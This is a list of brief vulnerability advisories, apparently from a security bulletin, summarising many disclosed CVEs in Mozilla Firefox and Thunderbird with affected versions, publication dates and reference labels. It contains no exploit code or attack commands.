When packets with a mismatched RTP payload type are sent in WebRTC connections, in some circumstances a potentially exploitable crash is triggered. This vulnerability affects Firefox ESR < 52.7 and Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5130
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird

A buffer overflow read during SVG filter color value operations, resulting in data exposure. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5412
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird

The file picker dialog can choose and display the wrong local default directory when instantiated. On some operating systems, this can lead to information disclosure, such as the operating system or the local account name. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5414
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird

If a malicious site uses the "view-source:" protocol in a series within a single hyperlink, it can trigger a non-exploitable browser crash when the hyperlink is selected. This was fixed by no longer making "view-source:" linkable. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5422
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A malicious site could spoof the contents of the print preview window if popup windows are enabled, resulting in user confusion of what site is currently loaded. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5421
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
If a malicious site repeatedly triggers a modal authentication prompt, eventually the browser UI will become non-responsive, requiring shutdown through the operating system. This is a denial of service (DOS) attack. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5419
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
On Linux, if the secure computing mode BPF (seccomp-bpf) filter is running when the Gecko Media Plugin sandbox is started, the sandbox fails to be applied and items that would run within the sandbox are run protected only by the running filter which is typically weak compared to the sandbox. Note: this issue only affects Linux. Other operating systems are not affected. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5426
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A segmentation fault can occur during some bidirectional layout operations. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5413
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A segmentation fault can occur in the Skia graphics library during some canvas operations due to issues with mask/clip intersection and empty masks. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5406
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
An out of bounds read error occurs when parsing some HTTP digest authorization responses, resulting in information leakage through the reading of random memory containing matches to specifically set patterns. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5418
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
Memory safety bugs were reported in Firefox 51. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5399
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A use-after-free vulnerability can occur while editing events in form elements on a page, resulting in a potentially exploitable crash. This vulnerability affects Firefox ESR < 52.6 and Thunderbird < 52.6.
2018-06-11 | not yet calculated | CVE-2018-5096
BID
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A use-after-free can occur during buffer storage operations within the ANGLE graphics library, used for WebGL content. The buffer storage can be freed while still in use in some circumstances, leading to a potentially exploitable crash. Note: This issue is in "libGLES", which is only in use on Windows. Other operating systems are not affected. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5411
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
Memory safety bugs were reported in Firefox ESR 52.6. These bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox ESR < 52.7 and Thunderbird < 52.7.
2018-06-11 | not yet calculated | CVE-2018-5145
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
A potentially exploitable crash in "EnumerateSubDocuments" while adding or removing sub-documents. This vulnerability affects Firefox ESR < 45.6 and Thunderbird < 45.6.
2018-06-11 | not yet calculated | CVE-2016-9905
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
In certain circumstances a networking event listener can be prematurely released. This appears to result in a null dereference in practice. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5416
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
When adding a range to an object in the DOM, it is possible to use "addRange" to add the range to an incorrect root object. This triggers a use-after-free, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5403
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_thunderbird
 
The Gecko Media Plugin sandbox allows access to local files that match specific regular expressions. On OS X, this matching allows access to some data in subdirectories of "/private/var" that could expose personal or temporary data. This has been updated to not allow access to "/private/var" and its subdirectories. Note: this issue only affects OS X. Other operating systems are not affected. This vulnerability affects Firefox < 52 and Thunderbird < 52.
2018-06-11 | not yet calculated | CVE-2017-5425
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 50.0.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 50.1.
2018-06-11 | not yet calculated | CVE-2016-9080
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The printing process can bypass local access protections to read files available through symlinks, bypassing local file restrictions. The printing process requires files in a specific format so arbitrary data cannot be read but it is possible that some local file information could be exposed. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5107
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A spoofing vulnerability can occur when a malicious site with an extremely long domain name is opened in an Android Custom Tab (a browser panel inside another app) and the default browser is Firefox for Android. This could allow an attacker to spoof which page is actually loaded and in use. Note: this issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5138
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 59. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5151
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
An issue where WebExtensions can use the mozAddonManager API to elevate privilege due to privileged pages being allowed in the permissions list. This allows a malicious extension to then install additional extensions without explicit user permission. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-9075
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 58. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5126
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A buffer overflow in SkiaGl caused when a GrGLBuffer is truncated during allocation. Later writers will overflow the buffer, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 50.1.
2018-06-11 | not yet calculated | CVE-2016-9894
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 50.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 51.
2018-06-11 | not yet calculated | CVE-2017-5374
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when arguments passed to the "IsPotentiallyScrollable" function are freed while still in use by scripts. This results in a potentially exploitable crash. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5100
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Two use-after-free errors during DOM operations resulting in potentially exploitable crashes. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-9067
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox
 
The combined, single-character version of the letter 'i' with any of the potential accents in Unicode, such as acute or grave, can be spoofed in the addressbar by the dotless version of 'i' followed by the same accent as a second character with most font sets. This allows for domain spoofing attacks because these combined domain names do not display as punycode. This vulnerability affects Firefox < 57.
2018-06-11 | not yet calculated | CVE-2017-7832
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
When a "javascript:" URL is dragged and dropped by a user into the addressbar, the URL will be processed and executed. This allows for users to be socially engineered to execute an XSS attack on themselves. This vulnerability affects Firefox < 53.
2018-06-11 | not yet calculated | CVE-2017-5458
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
JavaScript in the "about:webrtc" page is not sanitized properly before being assigned to "innerHTML". Data on this page is supplied by WebRTC usage and is not under third-party control, making this difficult to exploit, but the vulnerability could possibly be used for a cross-site scripting (XSS) attack. This vulnerability affects Firefox < 55.
2018-06-11 | not yet calculated | CVE-2017-7799
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An integer overflow during the parsing of XML using the Expat library. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-9063
BID
SECTRACK
SECTRACK
CONFIRM
DEBIAN
CONFIRM
mozilla -- firefox
 
A vulnerability where the security wrapper does not deny access to some exposed properties using the deprecated "_exposedProps_" mechanism on proxy objects. These properties should be explicitly unavailable to proxy objects. This vulnerability affects Firefox < 57.
2018-06-11 | not yet calculated | CVE-2017-7831
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Content Security Policy (CSP) is not applied correctly to all parts of multipart content sent with the "multipart/x-mixed-replace" MIME type. This could allow for script to run where CSP should block it, allowing for cross-site scripting (XSS) and other attacks. This vulnerability affects Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5164
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
An audio capture session can be started under an incorrect origin from the site making the capture request. Users are still prompted to allow the request but the prompt can display the wrong origin, leading to user confusion about which site is making the request to capture an audio stream. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5109
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 49. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-5289
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A STUN server in conjunction with a large number of "webkitRTCPeerConnection" objects can be used to send large STUN packets in a short period of time due to a lack of rate limiting being applied on e10s systems, allowing for a denial of service attack. This vulnerability affects Firefox < 51.
2018-06-11 | not yet calculated | CVE-2017-5388
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 56. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 57.
2018-06-11 | not yet calculated | CVE-2017-7827
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A mechanism where disruption of the loading of a new web page can cause the previous page's favicon and SSL indicator to not be reset when the new page is loaded. Note: this issue only affects Firefox for Android. Desktop Firefox is unaffected. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-5298
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Response header name interning does not have same-origin protections and these headers are stored in a global registry. This allows stored header names to be available cross-origin. This vulnerability affects Firefox < 55.
2018-06-11 | not yet calculated | CVE-2017-7797
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A previously installed malicious Android application with the same signature-level permissions as Firefox can intercept AuthTokens meant for Firefox only. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-5299
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The "instanceof" operator can bypass the Xray wrapper mechanism. When called on web content from the browser itself or an extension, the web content can provide its own result for that operator, possibly tricking the browser or extension into mishandling the element. This vulnerability affects Firefox < 56.
2018-06-11 | not yet calculated | CVE-2017-7820
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A heap buffer overflow vulnerability may occur in WebAssembly during Memory/Table resizing, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5093
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions may use "view-source:" URLs to view local "file:" URL content, as well as content stored in "about:cache", bypassing restrictions that only allow WebExtensions to view specific content. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5134
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A "javascript:" URL loaded by a malicious page can obfuscate its location by blanking the URL displayed in the addressbar, allowing for an attacker to spoof an existing page without the malicious page's address being displayed correctly. This vulnerability affects Firefox < 52.
2018-06-11 | not yet calculated | CVE-2017-5420
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Style editor traffic in the Developer Tools can be routed through a service worker hosted on a third party website if a user selects error links when these tools are open. This can allow style editor information used within Developer Tools to leak cross-origin. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5106
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions can use request redirection and a "filterResponseData" filter to bypass host permission settings to redirect network traffic and access content from a host for which they do not have explicit user permission. This vulnerability affects Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5166
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Use-after-free vulnerability in Web Animations when interacting with cycle collection found through fuzzing. This vulnerability affects Firefox < 51.
2018-06-11 | not yet calculated | CVE-2017-5379
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Use-after-free while manipulating the "navigator" object within WebVR. Note: WebVR is not currently enabled by default. This vulnerability affects Firefox < 50.1.
2018-06-11 | not yet calculated | CVE-2016-9896
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The Find API for WebExtensions can search some privileged pages, such as "about:debugging", if these pages are open in a tab. This could allow a malicious WebExtension to search for otherwise protected data if a user has it open. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5132
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions could use the "mozAddonManager" API by modifying the CSP headers on sites with the appropriate permissions and then using host requests to redirect script loads to a malicious site. This allows a malicious extension to then install additional extensions without explicit user permission. This vulnerability affects Firefox < 51.
2018-06-11 | not yet calculated | CVE-2017-5389
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The Live Bookmarks page and the PDF viewer can run injected script content if a user pastes script from the clipboard into them while viewing RSS feeds or PDF files. This could allow a malicious site to socially engineer a user to copy and paste malicious script content that could then run with the context of either page but does not allow for privilege escalation. This vulnerability affects Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5172
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A location bar spoofing attack where the location bar of a loaded page will be shown over the content of another tab due to a series of JavaScript events combined with fullscreen mode. Note: This issue only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 51.
2018-06-11 | not yet calculated | CVE-2017-5394
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If an HTTP authentication prompt is triggered by a background network request from a page or extension, it is displayed over the currently loaded foreground page. Although the prompt contains the real domain making the request, this can result in user confusion about the originating site of the authentication request and may cause users to mistakenly send private credential information to a third party site. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5115
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
During URL parsing, a maliciously crafted URL can cause a potentially exploitable crash. This vulnerability affects Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-5292
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A shared worker created from a "data:" URL in one tab can be shared by another tab with a different origin, bypassing the same-origin policy. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5136
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Mixed content blocking of insecure (HTTP) sub-resources in a secure (HTTPS) document was not correctly applied for resources that redirect from HTTPS to HTTP, allowing content that should be blocked, such as scripts, to be loaded on a page. This vulnerability affects Firefox < 57.
2018-06-11 | not yet calculated | CVE-2017-7835
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
URLs using "javascript:" have the protocol removed when pasted into the addressbar to protect users from cross-site scripting (XSS) attacks, but if a tab character is embedded in the "javascript:" URL the protocol is not removed and the script will execute. This could allow users to be socially engineered to run an XSS attack against themselves. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5143
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
On Windows systems, if non-null-terminated strings are copied into the crash reporter for some specific registry keys, stack memory data can be copied until a null is found. This can potentially contain private data from the local system. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Firefox < 55.
2018-06-11 | not yet calculated | CVE-2017-7790
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A non-existent chrome.manifest file will attempt to be loaded during startup from the primary installation directory. If a malicious user with local access puts chrome.manifest and other referenced files in this directory, they will be loaded and activated during startup. This could result in malicious software being added without consent or modification of referenced installed files. This vulnerability affects Firefox < 52.
2018-06-11 | not yet calculated | CVE-2017-5427
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Image for moz-icons can be accessed through the "moz-icon:" protocol through script in web content even when otherwise prohibited. This could allow for information leakage of which applications are associated with specific MIME types by a malicious page. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5140
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A mechanism to spoof the Firefox for Android addressbar using a "javascript:" URI. On Firefox for Android, the base domain is parsed incorrectly, making the resulting location less visibly a spoofed site and showing an incorrect domain in appended notifications. This vulnerability affects Firefox < 53.
2018-06-11 | not yet calculated | CVE-2017-5450
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A vulnerability in the notifications Push API where notifications can be sent through service workers by web content without direct user interaction. This could be used to open new tabs in a denial of service (DOS) attack or to display unwanted content from arbitrary URLs to users. This vulnerability affects Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5141
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
If a text string that happens to be a filename in the operating system's native format is dragged and dropped onto the addressbar, the specified local file will be opened. This is contrary to policy and is what would happen if the string were the equivalent "file:" URL. This vulnerability affects Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5182
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
The existence of a specifically requested local file can be found due to the double firing of the "onerror" when the "source" attribute on a "<track>" tag refers to a file that does not exist if the source page is loaded locally. This vulnerability affects Firefox < 51.
2018-06-11 | not yet calculated | CVE-2017-5387
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A Blob URL can violate origin attribute segregation, allowing it to be accessed from a private browsing tab and for data to be passed between the private browsing tab and a normal tab. This could allow for the leaking of private information specific to the private browsing context. This issue is mitigated by the requirement that the user enter the Blob URL manually in order for the access violation to occur. This vulnerability affects Firefox < 58.
2018-06-11 | not yet calculated | CVE-2018-5108
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A mechanism to inject static HTML into the RSS reader preview page due to a failure to escape characters sent as URL parameters for a feed's "TITLE" element. This vulnerability allows for spoofing but no scripted content can be run. This vulnerability affects Firefox < 53.
2018-06-11 | not yet calculated | CVE-2017-5453
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If Media Capture and Streams API permission is requested from documents with "data:" or "blob:" URLs, the permission notifications do not properly display the originating domain. The notification states "Unknown protocol" as the requestee, leading to user confusion about which site is asking for this permission. This vulnerability affects Firefox < 59.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5142
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
When dragging content from the primary browser pane to the addressbar on a malicious site, it is possible to change the addressbar so that the displayed location following navigation does not match the URL of the newly loaded page. This allows for spoofing attacks. This vulnerability affects Firefox < 52.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5417
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by "blob:" as the protocol, leading to user confusion and further spoofing attacks. This vulnerability affects Firefox < 52.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5415
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If a malicious attacker has used another vulnerability to gain full control over a content process, they may be able to replace the alternate data resources stored in the JavaScript Start-up Bytecode Cache (JSBC) for other JavaScript code. If the parent process then runs this replaced code, the executed script would be run with the parent process' privileges, escaping the sandbox on content processes. This vulnerability affects Firefox < 60.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5163
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Content Security Policy combined with HTTP to HTTPS redirection can be used by a malicious server to verify whether a known site is within a user's browser history. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9071
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The reader view will display cross-origin content when CORS headers are set to prohibit the loading of cross-origin content by a site. This could allow access to content that should be restricted in reader view. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5119
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
An error occurs in the elliptic curve point addition algorithm that uses mixed Jacobian-affine coordinates where it can yield a result "POINT_AT_INFINITY" when it should not. A man-in-the-middle attacker could use this to interfere with a connection, resulting in an attacked party computing an incorrect shared secret. This vulnerability affects Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7781
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If a long user name is used in a username/password combination in a site URL (such as "http://UserName:Password@example.com"), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service. This vulnerability affects Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7783
BID
SECTRACK
CONFIRM
EXPLOIT-DB
CONFIRM
mozilla -- firefox
 
Web content could access information in the HTTP cache if e10s is disabled. This can reveal some visited URLs and the contents of those pages. This issue affects Firefox 48 and 49. This vulnerability affects Firefox < 49.0.2.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-5288
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
WebExtensions with the appropriate permissions can attach content scripts to Mozilla sites such as accounts.firefox.com and listen to network traffic to the site through the "webRequest" API. For example, this allows for the interception of username and an encrypted password during login to Firefox Accounts. This issue does not expose synchronization traffic directly and is limited to the process of user login to the website and the data displayed to the user once logged in. This vulnerability affects Firefox < 60.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5152
BID
SECTRACK
CONFIRM
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
The AES-GCM implementation in WebCrypto API accepts 0-length IV when it should require a length of 1 according to the NIST Special Publication 800-38D specification. This might allow for the authentication key to be determined in some instances. This vulnerability affects Firefox < 56.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7822
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The location bar in Firefox for Android can be spoofed by forcing a user into fullscreen mode, blocking its exiting, and creating a fake location bar without any user notification. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9065
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The "export" function in the Certificate Viewer can force local filesystem navigation when the "common name" in a certificate contains slashes, allowing certificate content to be saved in unsafe locations with an arbitrary filename. This vulnerability affects Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5381
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A vulnerability where WebExtensions can download and attempt to open a file of some non-executable file types. This can be triggered without specific user interaction for the file download and open actions. This could be used to trigger known vulnerabilities in the programs that handle those document types. This vulnerability affects Firefox < 56.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7821
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If manipulated hyperlinked text with "chrome:" URL contained in it is dragged and dropped on the "home" icon, the home page can be reset to include a normally-unlinkable chrome page as one of the home page tabs. This vulnerability affects Firefox < 60.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5169
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
When entered directly, Reader Mode did not strip the username and password section of URLs displayed in the addressbar. This can be used for spoofing the domain of the current page. This vulnerability affects Firefox < 54.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7762
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If a document's Referrer Policy attribute is set to "no-referrer" sometimes two network requests are made for "<link>" elements instead of one. One of these requests includes the referrer instead of respecting the set policy to not include a referrer on requests. This vulnerability affects Firefox < 57.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7842
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A mechanism to bypass Content Security Policy (CSP) protections on sites that have a "script-src" policy of "'strict-dynamic'". If a target website contains an HTML injection flaw an attacker could inject a reference to a copy of the "require.js" library that is part of Firefox's Developer Tools, and then use a known technique using that library to bypass the CSP restrictions on executing injected scripts. This vulnerability affects Firefox < 60.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5175
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions with the "ActiveTab" permission are able to access frames hosted within the active tab even if the frames are cross-origin. Malicious extensions can inject frames from arbitrary origins into the loaded page and then interact with them, bypassing same-origin user expectations with this permission. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5116
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
If the "app.support.baseURL" preference is changed by a malicious local program to contain HTML and script content, this content is not sanitized. It will be executed if a user loads "chrome://browser/content/preferences/in-content/preferences.xul" directly in a tab and executes a search. This stored preference is also executed whenever an EME video player plugin displays a CDM-disabled message as a notification message. This vulnerability affects Firefox < 59.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5133
BID
SECTRACK
CONFIRM
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when the layer manager is freed too early when rendering specific SVG content, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7806
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A memory corruption vulnerability in Skia that can occur when using transforms to make gradients, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5377
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An issue with incorrect ownership model of "privateBrowsing" information exposed through developer tools. This can result in a non-exploitable crash when manually triggered during debugging. This vulnerability affects Firefox < 53.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5468
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when manipulating elements, events, and selection ranges during editor operations. This results in a potentially exploitable crash. This vulnerability affects Firefox < 59.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5128
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Feed preview for RSS feeds can be used to capture errors and exceptions generated by privileged content, allowing for the exposure of internal information not meant to be seen by web content. This vulnerability affects Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5382
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
